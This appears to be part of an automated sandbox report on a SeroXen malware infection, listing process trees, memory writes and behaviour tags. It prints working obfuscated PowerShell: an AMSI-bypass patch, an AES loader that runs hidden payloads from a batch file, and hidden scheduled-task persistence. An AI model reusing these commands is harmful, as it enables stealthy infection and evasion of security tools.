Token: SeSystemtimePrivilege	4684	powershell.exe
Token: SeProfSingleProcessPrivilege	4684	powershell.exe
Token: SeIncBasePriorityPrivilege	4684	powershell.exe
Token: SeCreatePagefilePrivilege	4684	powershell.exe
Token: SeBackupPrivilege	4684	powershell.exe
Token: SeRestorePrivilege	4684	powershell.exe
Token: SeShutdownPrivilege	4684	powershell.exe
Token: SeDebugPrivilege	4684	powershell.exe
Token: SeSystemEnvironmentPrivilege	4684	powershell.exe
Token: SeRemoteShutdownPrivilege	4684	powershell.exe
Token: SeUndockPrivilege	4684	powershell.exe
Token: SeManageVolumePrivilege	4684	powershell.exe
Token: 33	4684	powershell.exe
Token: 34	4684	powershell.exe
Token: 35	4684	powershell.exe
Token: 36	4684	powershell.exe
Token: SeIncreaseQuotaPrivilege	4684	powershell.exe
Token: SeSecurityPrivilege	4684	powershell.exe
Token: SeTakeOwnershipPrivilege	4684	powershell.exe
Token: SeLoadDriverPrivilege	4684	powershell.exe
Token: SeSystemProfilePrivilege	4684	powershell.exe
Token: SeSystemtimePrivilege	4684	powershell.exe
Token: SeProfSingleProcessPrivilege	4684	powershell.exe
Token: SeIncBasePriorityPrivilege	4684	powershell.exe
Token: SeCreatePagefilePrivilege	4684	powershell.exe
Token: SeBackupPrivilege	4684	powershell.exe
Token: SeRestorePrivilege	4684	powershell.exe
Token: SeShutdownPrivilege	4684	powershell.exe
Token: SeDebugPrivilege	4684	powershell.exe
Token: SeSystemEnvironmentPrivilege	4684	powershell.exe
Token: SeRemoteShutdownPrivilege	4684	powershell.exe
Token: SeUndockPrivilege	4684	powershell.exe
Token: SeManageVolumePrivilege	4684	powershell.exe
Token: 33	4684	powershell.exe
Token: 34	4684	powershell.exe
Token: 35	4684	powershell.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

msedge.exe

pid	process
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe
4340	msedge.exe

Suspicious use of UnmapMainImage 2 IoCs

Processes:

svchost.exe

pid process

2668 svchost.exe
2668 svchost.exe

pid	process
2668	svchost.exe
2668	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 2992 wrote to memory of 1900	2992	cmd.exe	powershell.exe
PID 2992 wrote to memory of 1900	2992	cmd.exe	powershell.exe
PID 2992 wrote to memory of 1900	2992	cmd.exe	powershell.exe
PID 1900 wrote to memory of 4684	1900	powershell.exe	powershell.exe
PID 1900 wrote to memory of 4684	1900	powershell.exe	powershell.exe
PID 1900 wrote to memory of 4684	1900	powershell.exe	powershell.exe
PID 1900 wrote to memory of 4116	1900	powershell.exe	WScript.exe
PID 1900 wrote to memory of 4116	1900	powershell.exe	WScript.exe
PID 1900 wrote to memory of 4116	1900	powershell.exe	WScript.exe
PID 4116 wrote to memory of 2640	4116	WScript.exe	cmd.exe
PID 4116 wrote to memory of 2640	4116	WScript.exe	cmd.exe
PID 4116 wrote to memory of 2640	4116	WScript.exe	cmd.exe
PID 2640 wrote to memory of 3544	2640	cmd.exe	powershell.exe
PID 2640 wrote to memory of 3544	2640	cmd.exe	powershell.exe
PID 2640 wrote to memory of 3544	2640	cmd.exe	powershell.exe
PID 3544 wrote to memory of 2200	3544	powershell.exe	schtasks.exe
PID 3544 wrote to memory of 2200	3544	powershell.exe	schtasks.exe
PID 3544 wrote to memory of 2200	3544	powershell.exe	schtasks.exe
PID 3544 wrote to memory of 1312	3544	powershell.exe	Client.exe
PID 3544 wrote to memory of 1312	3544	powershell.exe	Client.exe
PID 3544 wrote to memory of 1312	3544	powershell.exe	Client.exe
PID 3544 wrote to memory of 2508	3544	powershell.exe	install.exe
PID 3544 wrote to memory of 2508	3544	powershell.exe	install.exe
PID 3544 wrote to memory of 2508	3544	powershell.exe	install.exe
PID 3440 wrote to memory of 4864	3440	powershell.EXE	dllhost.exe
PID 3440 wrote to memory of 4864	3440	powershell.EXE	dllhost.exe
PID 3440 wrote to memory of 4864	3440	powershell.EXE	dllhost.exe
PID 3440 wrote to memory of 4864	3440	powershell.EXE	dllhost.exe
PID 3440 wrote to memory of 4864	3440	powershell.EXE	dllhost.exe
PID 3440 wrote to memory of 4864	3440	powershell.EXE	dllhost.exe
PID 3440 wrote to memory of 4864	3440	powershell.EXE	dllhost.exe
PID 3440 wrote to memory of 4864	3440	powershell.EXE	dllhost.exe
PID 4864 wrote to memory of 616	4864	dllhost.exe	winlogon.exe
PID 4864 wrote to memory of 680	4864	dllhost.exe	lsass.exe
PID 4864 wrote to memory of 960	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 64	4864	dllhost.exe	dwm.exe
PID 4864 wrote to memory of 428	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1020	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1132	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1140	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1152	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1164	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1232	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1256	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1376	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1408	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1508	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1548	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1564	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1664	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1712	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1720	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1800	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1816	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1916	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1928	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1980	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1044	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 1832	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 2148	4864	dllhost.exe	spoolsv.exe
PID 4864 wrote to memory of 2272	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 2348	4864	dllhost.exe	svchost.exe
PID 4864 wrote to memory of 2408	4864	dllhost.exe	sihost.exe
PID 4864 wrote to memory of 2416	4864	dllhost.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:64

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ff8c2f20-6fe3-4046-b120-ef0108448bfb}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4864

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1140

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FcXqNBxGrfcD{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$knTEfVObbjgPTl,[Parameter(Position=1)][Type]$pjUzxCRTiE)$wyoMSFNzdPL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'ed'+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+'T'+'y'+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+'ubl'+'i'+'c'+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+'l'+'a'+'s'+''+'s'+'',[MulticastDelegate]);$wyoMSFNzdPL.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$knTEfVObbjgPTl).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+','+'M'+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$wyoMSFNzdPL.DefineMethod(''+'I'+'n'+'v'+'ok'+'e'+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+','+'N'+''+[Char](101)+''+[Char](119)+'S'+'l'+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+'r'+'tu'+'a'+'l',$pjUzxCRTiE,$knTEfVObbjgPTl).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $wyoMSFNzdPL.CreateType();}$RPlafvtcSCSiX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+'e'+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+'3'+'2'+''+[Char](46)+'U'+'n'+'s'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+'v'+'e'+'Me'+'t'+''+[Char](104)+''+'o'+'ds');$gXLYzRsyhhTsLI=$RPlafvtcSCSiX.GetMethod('G'+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+'o'+'c'+'A'+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'Sta'+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$oLDlYUeEBEFDnqbDoVZ=FcXqNBxGrfcD @([String])([IntPtr]);$reHkBdnrxRSsxmgmNsjJFy=FcXqNBxGrfcD @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VywWsZUgyeE=$RPlafvtcSCSiX.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+'o'+'d'+[Char](117)+''+[Char](108)+'eH'+[Char](97)+'n'+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+'l'+'3'+''+[Char](50)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')));$EciTNMnxNGknba=$gXLYzRsyhhTsLI.Invoke($Null,@([Object]$VywWsZUgyeE,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+[Char](76)+''+'i'+''+'b'+''+[Char](114)+''+[Char](97)+''+[Char](114)+'y'+'A'+'')));$DMUkRNwwedjYRcVeD=$gXLYzRsyhhTsLI.Invoke($Null,@([Object]$VywWsZUgyeE,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+''+[Char](80)+''+'r'+'ot'+'e'+''+'c'+'t')));$qjTTsuo=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EciTNMnxNGknba,$oLDlYUeEBEFDnqbDoVZ).Invoke(''+[Char](97)+''+'m'+''+'s'+''+[Char](105)+'.'+[Char](100)+''+'l'+'l');$ZCUuqwZEdfKQBlAjm=$gXLYzRsyhhTsLI.Invoke($Null,@([Object]$qjTTsuo,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'iS'+[Char](99)+'a'+[Char](110)+'B'+[Char](117)+''+[Char](102)+'f'+[Char](101)+'r')));$dOPsIXoubi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DMUkRNwwedjYRcVeD,$reHkBdnrxRSsxmgmNsjJFy).Invoke($ZCUuqwZEdfKQBlAjm,[uint32]8,4,[ref]$dOPsIXoubi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ZCUuqwZEdfKQBlAjm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DMUkRNwwedjYRcVeD,$reHkBdnrxRSsxmgmNsjJFy).Invoke($ZCUuqwZEdfKQBlAjm,[uint32]8,0x20,[ref]$dOPsIXoubi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+'W'+''+'A'+'RE').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1408

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
- Modifies registry class
PID:2408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1548

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1044

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:1832

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Suspicious use of UnmapMainImage
PID:2668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2708

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2800

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3448

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
PID:3532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:2992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lV00YZkMqK2WikDyAFyEbHtVHlk19tlqai4+2KYGz1A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ohwcqqva4JCO7DLoEbGU5A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VRfwB=New-Object System.IO.MemoryStream(,$param_var); $vPQnJ=New-Object System.IO.MemoryStream; $UUurH=New-Object System.IO.Compression.GZipStream($VRfwB, [IO.Compression.CompressionMode]::Decompress); $UUurH.CopyTo($vPQnJ); $UUurH.Dispose(); $VRfwB.Dispose(); $vPQnJ.Dispose(); $vPQnJ.ToArray();}function execute_function($param_var,$param2_var){ $HBxgS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KZtfv=$HBxgS.EntryPoint; $KZtfv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$gmyEL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($fSioa in $gmyEL) { if ($fSioa.StartsWith(':: ')) { $llpNM=$fSioa.Substring(3); break; }}$payloads_var=[string[]]$llpNM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_642_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_642.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4684

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_642.vbs"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_642.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:2640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lV00YZkMqK2WikDyAFyEbHtVHlk19tlqai4+2KYGz1A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ohwcqqva4JCO7DLoEbGU5A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VRfwB=New-Object System.IO.MemoryStream(,$param_var); $vPQnJ=New-Object System.IO.MemoryStream; $UUurH=New-Object System.IO.Compression.GZipStream($VRfwB, [IO.Compression.CompressionMode]::Decompress); $UUurH.CopyTo($vPQnJ); $UUurH.Dispose(); $VRfwB.Dispose(); $vPQnJ.Dispose(); $vPQnJ.ToArray();}function execute_function($param_var,$param2_var){ $HBxgS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KZtfv=$HBxgS.EntryPoint; $KZtfv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_642.bat';$gmyEL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_642.bat').Split([Environment]::NewLine);foreach ($fSioa in $gmyEL) { if ($fSioa.StartsWith(':: ')) { $llpNM=$fSioa.Substring(3); break; }}$payloads_var=[string[]]$llpNM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3544

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:2200

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1312

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:4780

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
7⤵
- Executes dropped EXE
PID:2508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9a88c46f8,0x7ff9a88c4708,0x7ff9a88c4718
3⤵
PID:4368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,820439545671324440,6590442592881513613,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
